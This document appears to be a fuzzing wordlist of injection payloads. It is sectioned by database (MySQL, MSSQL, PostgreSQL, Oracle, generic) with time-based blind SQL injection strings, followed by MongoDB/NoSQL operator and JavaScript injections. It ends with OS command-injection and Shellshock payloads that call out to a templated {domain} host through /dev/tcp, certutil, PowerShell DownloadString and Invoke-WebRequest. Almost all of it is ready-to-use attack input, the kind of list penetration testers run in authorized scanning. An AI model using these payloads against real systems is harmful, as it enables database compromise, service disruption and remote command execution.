##MYSQL##
'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
 and sleep 5--
 and sleep 5
 and sleep(5)--
 and sleep(5)
 and SELECT SLEEP(5); #
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
 or sleep 5--
 or sleep 5
 or sleep(5)--
 or sleep(5)
 or SELECT SLEEP(5); #
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
##MSSQL##
;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
##PostgresSQL##
";SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
' SELECT pg_sleep(5);
or SELECT pg_sleep(5);
' SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
##Oracle##
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
##Generic##
sleep(5)#
(sleep 5)--
(sleep 5)
(sleep(5))--
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
";sleep 5--
";sleep 5
";sleep(5)--
";sleep(5)
";SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + '
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
;sleep 5--
;sleep 5
;sleep(5)--
;sleep(5)
;SELECT SLEEP(5); #
'&&SLEEP(5)&&'1
' SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
'"\/$[].>
{"$ne": null}
{"$ne": "foo"}
{"$gt": undefined}
{"$ne": -1}
{"$in": []}
{"$where":  "return true"}
{"$or": [{},{"foo":"1"}]}
{"$where":  "sleep(9000)"}
;sleep(9000);
[$ne]
[$regex]
$eq
$gt
$ne
$lt
$regex
$func
$var_dump
*
$exists
$nin
GT
LT
NE
EQ
NOT_CONTAINS
CONTAINS
IN
BEGINS__WITH
BETWEEN
NULL
NOT_NULL
LE
GE
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
$(/bin/bash -c "true > /dev/tcp/{domain}/80")
$(/bin/sh -c "true > /dev/tcp/{domain}/80")
$(certutil -urlcache -f 'http://{domain}')
$(exec 6< /dev/tcp/{domain}/80)
$(powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'))
$(powershell -c Invoke-WebRequest 'http://{domain}')
& /bin/bash -c "true > /dev/tcp/{domain}/80"
& /bin/sh -c "true > /dev/tcp/{domain}/80"
& certutil -urlcache -f 'http://{domain}'
& exec 6< /dev/tcp/{domain}/80
& ping {domain} -c 2
& powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
& powershell -c Invoke-WebRequest 'http://{domain}'
&& /bin/bash -c "true > /dev/tcp/{domain}/80"
&& /bin/sh -c "true > /dev/tcp/{domain}/80"
&& certutil -urlcache -f 'http://{domain}'
&& exec 6< /dev/tcp/{domain}/80
&& ping {domain} -c 2
&& powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
&& powershell -c Invoke-WebRequest 'http://{domain}'
&/bin/bash -c "true > /dev/tcp/{domain}/80"&'\"`0&/bin/bash -c "true > /dev/tcp/{domain}/80"&`'
&/bin/sh -c "true > /dev/tcp/{domain}/80"&'\"`0&/bin/sh -c "true > /dev/tcp/{domain}/80"&`'
&certutil -urlcache -f 'http://{domain}'&'\"`0&certutil -urlcache -f 'http://{domain}'&`'
&exec 6< /dev/tcp/{domain}/80&'\"`0&exec 6< /dev/tcp/{domain}/80&`'
&nslookup {domain}&'\"`0&nslookup {domain}&`'
&ping {domain} -c 2&'\"`0&ping {domain} -c 2&`'
&powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')&'\"`0&powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')&`'
&powershell -c Invoke-WebRequest 'http://{domain}'&'\"`0&powershell -c Invoke-WebRequest 'http://{domain}'&`'
&printenv&'\"`0&printenv&`'
&sleep 9&'\"`0&sleep 9&`'
() { 0; }; /bin/bash -c "true > /dev/tcp/{domain}/80";
() { 0; }; /bin/sh -c "true > /dev/tcp/{domain}/80";
() { 0; }; certutil -urlcache -f 'http://{domain}';
() { 0; }; exec 6< /dev/tcp/{domain}/80;
() { 0; }; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}');
() { 0; }; powershell -c Invoke-WebRequest 'http://{domain}';
() { _; } >_[$($())] { /bin/bash -c "true > /dev/tcp/{domain}/80"; }
() { _; } >_[$($())] { /bin/sh -c "true > /dev/tcp/{domain}/80"; }
() { _; } >_[$($())] { certutil -urlcache -f 'http://{domain}'; }
() { _; } >_[$($())] { exec 6< /dev/tcp/{domain}/80; }
() { _; } >_[$($())] { powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); }
() { _; } >_[$($())] { powershell -c Invoke-WebRequest 'http://{domain}'; }
/*$(/bin/bash -c "true > /dev/tcp/{domain}/80")`/bin/bash -c "true > /dev/tcp/{domain}/80"``*/-sleep(5)-'/*$(/bin/bash -c "true > /dev/tcp/{domain}/80")`/bin/bash -c "true > /dev/tcp/{domain}/80"` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(/bin/sh -c "true > /dev/tcp/{domain}/80")`/bin/sh -c "true > /dev/tcp/{domain}/80"``*/-sleep(5)-'/*$(/bin/sh -c "true > /dev/tcp/{domain}/80")`/bin/sh -c "true > /dev/tcp/{domain}/80"` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(certutil -urlcache -f 'http://{domain}')`certutil -urlcache -f 'http://{domain}'``*/-sleep(5)-'/*$(certutil -urlcache -f 'http://{domain}')`certutil -urlcache -f 'http://{domain}'` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(exec 6< /dev/tcp/{domain}/80)`exec 6< /dev/tcp/{domain}/80``*/-sleep(5)-'/*$(exec 6< /dev/tcp/{domain}/80)`exec 6< /dev/tcp/{domain}/80` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(ping {domain} -c 2)`ping {domain} -c 2``*/-sleep(5)-'/*$(ping {domain} -c 2)`ping {domain} -c 2` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'))`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')``*/-sleep(5)-'/*$(powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'))`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(powershell -c Invoke-WebRequest 'http://{domain}')`powershell -c Invoke-WebRequest 'http://{domain}'``*/-sleep(5)-'/*$(powershell -c Invoke-WebRequest 'http://{domain}')`powershell -c Invoke-WebRequest 'http://{domain}'` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
/bin/bash -c "true > /dev/tcp/{domain}/80"
/bin/bash -c "true > /dev/tcp/{domain}/80" &/bin/bash -c "true > /dev/tcp/{domain}/80" ; /bin/bash -c "true > /dev/tcp/{domain}/80"  &/bin/bash -c "true > /dev/tcp/{domain}/80" ; /bin/bash -c "true > /dev/tcp/{domain}/80" & /bin/bash -c "true > /dev/tcp/{domain}/80" ; /bin/bash -c "true > /dev/tcp/{domain}/80"  & /bin/bash -c "true > /dev/tcp/{domain}/80"
/bin/bash -c "true > /dev/tcp/{domain}/80"&&/bin/bash -c "true > /dev/tcp/{domain}/80"; /bin/bash -c "true > /dev/tcp/{domain}/80" &&/bin/bash -c "true > /dev/tcp/{domain}/80"; /bin/bash -c "true > /dev/tcp/{domain}/80"&& /bin/bash -c "true > /dev/tcp/{domain}/80"; /bin/bash -c "true > /dev/tcp/{domain}/80" && /bin/bash -c "true > /dev/tcp/{domain}/80"
/bin/bash -c "true > /dev/tcp/{domain}/80"||id; /bin/bash -c "true > /dev/tcp/{domain}/80" ||id; /bin/bash -c "true > /dev/tcp/{domain}/80"|| id; /bin/bash -c "true > /dev/tcp/{domain}/80" || id
/bin/sh -c "true > /dev/tcp/{domain}/80"
/bin/sh -c "true > /dev/tcp/{domain}/80" &/bin/sh -c "true > /dev/tcp/{domain}/80" ; /bin/sh -c "true > /dev/tcp/{domain}/80"  &/bin/sh -c "true > /dev/tcp/{domain}/80" ; /bin/sh -c "true > /dev/tcp/{domain}/80" & /bin/sh -c "true > /dev/tcp/{domain}/80" ; /bin/sh -c "true > /dev/tcp/{domain}/80"  & /bin/sh -c "true > /dev/tcp/{domain}/80"
/bin/sh -c "true > /dev/tcp/{domain}/80"&&/bin/sh -c "true > /dev/tcp/{domain}/80"; /bin/sh -c "true > /dev/tcp/{domain}/80" &&/bin/sh -c "true > /dev/tcp/{domain}/80"; /bin/sh -c "true > /dev/tcp/{domain}/80"&& /bin/sh -c "true > /dev/tcp/{domain}/80"; /bin/sh -c "true > /dev/tcp/{domain}/80" && /bin/sh -c "true > /dev/tcp/{domain}/80"
/bin/sh -c "true > /dev/tcp/{domain}/80"||id; /bin/sh -c "true > /dev/tcp/{domain}/80" ||id; /bin/sh -c "true > /dev/tcp/{domain}/80"|| id; /bin/sh -c "true > /dev/tcp/{domain}/80" || id
/dev/null; /bin/bash -c "true > /dev/tcp/{domain}/80" ; echo
/dev/null; /bin/sh -c "true > /dev/tcp/{domain}/80" ; echo
/dev/null; certutil -urlcache -f 'http://{domain}' ; echo
/dev/null; exec 6< /dev/tcp/{domain}/80 ; echo
/dev/null; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') ; echo
/dev/null; powershell -c Invoke-WebRequest 'http://{domain}' ; echo
1;/bin/bash -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}’;/bin/bash -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}”;/bin/bash -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}
1;/bin/sh -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}’;/bin/sh -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}”;/bin/sh -c "true > /dev/tcp/{domain}/80"${IFS};#${IFS}
1;certutil -urlcache -f 'http://{domain}'${IFS};#${IFS}’;certutil -urlcache -f 'http://{domain}'${IFS};#${IFS}”;certutil -urlcache -f 'http://{domain}'${IFS};#${IFS}
1;exec 6< /dev/tcp/{domain}/80${IFS};#${IFS}’;exec 6< /dev/tcp/{domain}/80${IFS};#${IFS}”;exec 6< /dev/tcp/{domain}/80${IFS};#${IFS}
1;ping {domain} -c 2${IFS};#${IFS}’;ping {domain} -c 2${IFS};#${IFS}”;ping {domain} -c 2${IFS};#${IFS}
